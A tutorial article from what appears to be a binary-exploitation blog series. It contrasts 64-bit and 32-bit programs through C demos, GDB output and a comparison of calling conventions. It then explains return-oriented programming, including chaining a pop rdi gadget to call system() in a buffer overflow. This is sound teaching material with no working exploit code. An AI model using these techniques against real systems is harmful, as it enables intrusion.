64-bit vs 32-bit

Introduction

Up to this point, we have covered exploiting binary vulnerabilities in 32-bit programs. However, with the prevalence of 64-bit computing systems today, this article will introduce x64 binary exploitation.

Concepts

Firstly, we'll talk about 64-Bit architecture main concepts, and differences between it and 32-bit.

64-bit vs 32-bit

What is 64-Bit Architecture?

In computer systems, "64-bit" refers to the width of the processor's registers and the amount of data it can handle at once. A 64-bit processor can process 64 bits of data in one go, compared to a 32-bit processor, which handles 32 bits at a time. This means a 64-bit system can work with larger chunks of data and access more memory.

One of the biggest advantages of 64-bit architecture is its ability to address more memory. A 32-bit system can only use up to 4 gigabytes (GB) of RAM, while a 64-bit system can theoretically access up to 18 exabytes of RAM. In practical terms, this means a 64-bit system can use much more memory, which is especially useful for running large applications or multiple programs simultaneously.

Registers & Pointers

As I've already explained in my article on Introduction to Binary Exploitation, registers are small storage locations within the CPU that hold data temporarily while the processor is working. In a 64-bit processor, these registers are 64 bits wide, allowing them to hold larger values compared to 32-bit registers. This results in more efficient processing and better performance for tasks that require handling large numbers or complex data.

Pointers are variables that store the memory addresses of other variables. In a 32-bit system, pointers are 32 bits long (4 bytes), which means they can address up to 4 GB of memory. In a 64-bit system, pointers are 64 bits long (8 bytes), allowing them to address a much larger range of memory—up to 18 exabytes in theory. This greatly expands the amount of memory a program can use.

Let’s create a simple program to demonstrate the difference between the size of pointers in 64-bit and 32-bit programs.

#include <stdio.h>

int main(){

    int x = 5;
    int *pX = &x; 

    printf("pX pointer points to: %p\n", (void *)pX);
    printf("Value pointed to by pX: %d\n", *pX);

    return 0; 
}

This program performs two main tasks in sequence. First, it declares an integer variable named x and assigns it the value 5. Next, it declares an integer pointer named pX, which is initialized to point to the memory address of the variable x. This means that pX now contains the address where x is stored.

The program then uses two printf() functions to display information about the pointer and the variable it points to. In the first printf() call, it prints the memory address that the pointer pX is pointing to. This shows where in memory the variable x is located. In the second printf() call, it shows the value stored at the memory address pX points to, which in this case is the value of the variable x, which is 5.

Now, compile it with the -m32 parameter to instruct the compiler to create a 32-bit binary:

elswix@ubuntu$ gcc program.c -o program -m32

Let's execute it:

elswix@ubuntu$ ./program
pX pointer points to: 0xffec94b4
Value pointed to by pX: 5

As observed, the program printed the memory address of the variable x. Since we compiled it with the -m32 parameter, the memory address is 32 bits long (4 bytes).

Now, compile it without the -m32 parameter. By default, the compiler creates a 64-bit binary if no other options are specified.

elswix@ubuntu$ gcc program.c -o program

Now, let's execute it:

elswix@ubuntu$ ./program
pX pointer points to: 0x7ffe44198b9c
Value pointed to by pX: 5

As observed, the pX pointer holds a significantly larger address in the 64-bit version. The same applies to registers: in 64-bit systems, registers can hold 8-byte values. The following image shows a GDB output using the context tool from GEF, illustrating the differences between 32-bit and 64-bit programs:

With larger registers and pointers, 64-bit systems can handle more data at once and access more memory, which changes how software is written and how vulnerabilities are exploited. For example, buffer overflows and other attacks that involve manipulating pointers can be more complex because the addresses are longer and more complex.

Segmentation

Segmentation refers to how memory is divided and managed by the CPU and operating system. In a 64-bit system, memory segmentation can be more complex because it handles a larger address space. Segmentation helps organize memory into different sections, such as code, data, and stack segments. This organization helps manage memory efficiently and prevents different types of data from interfering with each other.

Security

In 64-bit systems, memory protection features are more robust compared to 32-bit systems due to the larger address space and more advanced CPU features.

ASLR: The larger memory address range in 64-bit systems allows for more effective implementation of ASLR, making it even harder for attackers to guess memory locations.

I discussed this in my first article on the ret2libc technique. When demonstrating how to exploit a buffer overflow using this technique, I covered the Brute Force method. This method involves selecting a base libc address and executing the binary multiple times until the libc address matches the chosen one, allowing us to call arbitrary libc functions with valid memory addresses. In 32-bit systems, memory addresses are relatively small, so collisions can occur, making it feasible to eventually guess the correct address. However, in 64-bit systems, memory addresses are vastly larger, making it nearly impossible to achieve the same result through brute forcing with a base libc address.

Enhanced Security: 64-bit CPUs often include additional security features like SMEP (Supervisor Mode Execution Prevention), which prevents code execution in supervisor mode (used by the operating system) from user-mode memory areas.

Calling Conventions

Calling conventions are a set of rules that define how functions receive parameters from the caller and how they return results. These rules include details on where parameters are stored (in registers or on the stack), how the stack is managed, and who is responsible for cleaning up the stack after a function call. Calling conventions ensure that functions communicate consistently, which is essential for correct program execution.

In 64-bit systems, calling conventions are different from those in 32-bit systems due to the changes in register sizes and the larger address space. For example:

Registers for Parameters: In 64-bit systems, more parameters can be passed in registers rather than on the stack. This can speed up function calls and improve performance. For instance, the x86-64 architecture uses specific registers (like rdi, rsi, rdx, etc.) to pass the first few arguments to functions, while additional arguments are passed on the stack.

Stack Management: The rules for stack alignment and management can be more stringent in 64-bit systems to ensure compatibility with the larger register sizes. Proper alignment helps maintain performance and stability.

In 32-bit systems, function parameters are typically passed on the stack. Only a limited number of parameters can be passed in registers, and the rest are pushed onto the stack. This can make function calls slower due to stack operations.

Let’s compare how functions are called in 32-bit versus 64-bit systems using the following program:

#include <stdio.h>

int sum(int a,int b,int c,int d,int e,int f,int g,int h,int i){
    return a+b+c+d+e+f+g+h+i;
}

int main(){

    int result;
    result = sum(1, 3, 3, 10, 50, 250, 20, 500, 500);
    printf("[+] RESULT: %d", result);

    return 0; 
}

Let's compile a version for 32-bit and another for 64-bit:

elswix@ubuntu$ gcc program.c -o program64
elswix@ubuntu$ gcc program.c -o program32 -m32

Both versions should print the same value:

elswix@ubuntu$ ./program32
[+] RESULT: 1337                                                            
elswix@ubuntu$ ./program64
[+] RESULT: 1337
elswix@ubuntu$

Let’s use GDB to thoroughly analyze what’s happening behind the scenes:

elswix@ubuntu$ gdb -q ./program32
GEF for linux ready, type `gef' to start, `gef config' to configure
88 commands loaded and 5 functions added for GDB 12.1 in 0.00ms using Python engine 3.10
Reading symbols from program32...
(No debugging symbols found in program32)
gef$

If we disassemble the main function in the 32-bit version, we will observe the following code:

As observed, when calling the sum() function, each parameter value is pushed onto the stack before the function is invoked.

Let's see what happens in the 64-bit version:

As observed, the main function is notably smaller in the 64-bit version. Additionally, we can see that the first six parameter values for the sum function are passed through the registers in the following order: rdi, rsi, rdx, rcx, r8, and r9.

Keep this in mind, as it is important for exploiting 64-bit programs.

Examples of Calling Conventions in 64-bit

Different operating systems and compilers may use different calling conventions. For instance:

System V AMD64 ABI (used on Linux): This convention specifies that the first six integer or pointer arguments are passed in specific registers (rdi, rsi, rdx, rcx, r8, r9), while additional arguments are passed on the stack. Return values are typically passed in the rax register.

Microsoft x64 Calling Convention (used on Windows): This convention also uses registers to pass the first four arguments (rcx, rdx, r8, r9) and the stack for additional arguments. Return values are passed in rax, and there are specific rules for stack alignment.

Return-Oriented Programming (ROP)

Return-Oriented Programming (ROP) is a sophisticated exploitation technique used to execute arbitrary code despite the presence of security mechanisms like Data Execution Prevention (DEP) and Address Space Layout Randomization (ASLR). ROP circumvents these defenses by reusing small sequences of instructions, known as "gadgets," that already exist within the program or its libraries. These gadgets typically end in a ret instruction, allowing the attacker to chain them together to perform malicious actions and achieve their objectives.

How Does ROP Work?

Finding Gadgets: Gadgets are small pieces of code ending in a ret instruction. Each gadget performs a specific action, such as adding numbers or moving data. These gadgets are found within the executable code of a program or its libraries.

Chaining Gadgets: An attacker crafts a sequence of gadgets that, when executed in order, performs the desired malicious operations. This sequence is controlled by manipulating the stack to set up the appropriate return addresses.

Bypassing Protections: By using gadgets and manipulating the return address stack, ROP can bypass memory protection mechanisms like DEP, which prevents execution of code in non-executable regions. ROP does not inject new code but reuses existing code, making it effective against such defenses.

If you've read my article on Introduction to Binary Exploitation, you might understand why these instructions must always end with a ret instruction (which is why it's called Return-Oriented Programming). However, if you don't fully grasp why this instruction is always required, let's discuss it further.

The ret instruction is responsible for ending every function in a binary. It essentially serves the opposite function of the call instruction.

Imagine you call a function in your program; in assembly, it looks something like this:

call myFunction

The call instruction performs two main actions. First, it pushes the address of the instruction following the call onto the stack; this is known as the return address for the called function. Then, it updates the Instruction Pointer to the beginning of the called function, thus altering the program's execution flow to redirect it to the new function.

When it's time to return to the previous function (the one that called the current function), the ret instruction plays a crucial role. As noted earlier, the call instruction pushes the return address onto the stack. When the ret instruction is executed, it pops this return address off the stack and loads it into the Instruction Pointer, thereby resuming execution at the point where the call was made.

But why is this important for exploitation, and why must instructions in Return-Oriented Programming (ROP) always end with a ret?

For instance, consider exploiting a stack-based buffer overflow. When you overflow the buffer on the stack, you eventually reach the return address. If you overwrite this address with the address of another function, the program will return to that function when the current function completes. In this scenario, you don’t need an additional ret instruction after the function call.

However, if you need to call a function that requires parameters, the situation changes. In 64-bit programs, parameters are typically passed through registers (at least the first six), so you need to place the parameter values in these registers. In 32-bit programs, parameters were often passed via the stack, but now, with 64-bit, you need to manipulate registers directly.

To achieve this, you can use pop instructions. For example, suppose you want to call the system() function, which expects a single parameter in the rdi register. You need to execute a pop rdi instruction to load this parameter into rdi. This requires placing the parameter value on the stack in such a way that when pop rdi is executed, it retrieves the correct value from the stack and loads it into rdi. After executing the pop rdi instruction, you must ensure that the next instruction to execute is a ret. This will load the address of system() (which you placed on the stack, following the value you want to load into rdi) into the Instruction Pointer. Without this ret, the system() function will not be called.

Thus, the ret instruction is essential because it ensures the correct function is called after setting up the necessary parameters.

Conclusion

In summary, there are notable differences between 32-bit and 64-bit programs. While exploiting 64-bit programs is more complex, it is manageable with the right approach.

Keep these concepts in mind, as the next article will be the second part of our exploration of ret2libc. It will focus on using Return-Oriented Programming (ROP) to exploit a 64-bit buffer overflow.

References

I learned these concepts from:

https://en.wikipedia.org/wiki/Calling_convention
https://en.wikipedia.org/wiki/X86_calling_conventions
https://learn.microsoft.com/en-us/cpp/build/x64-calling-convention
https://learn.microsoft.com/en-us/cpp/cpp/calling-conventions
https://ir0nstone.gitbook.io/notes/types/stack/return-oriented-programming/calling-conventions
https://book.hacktricks.xyz/binary-exploitation/rop-return-oriented-programing
https://en.wikipedia.org/wiki/Return-oriented_programming
https://ctf101.org/binary-exploitation/return-oriented-programming/
https://www.youtube.com/watch?v=vXWHmucgZW0&pp=ygUVbGl2ZW92ZXJmbG93IDMyIHZzIDY0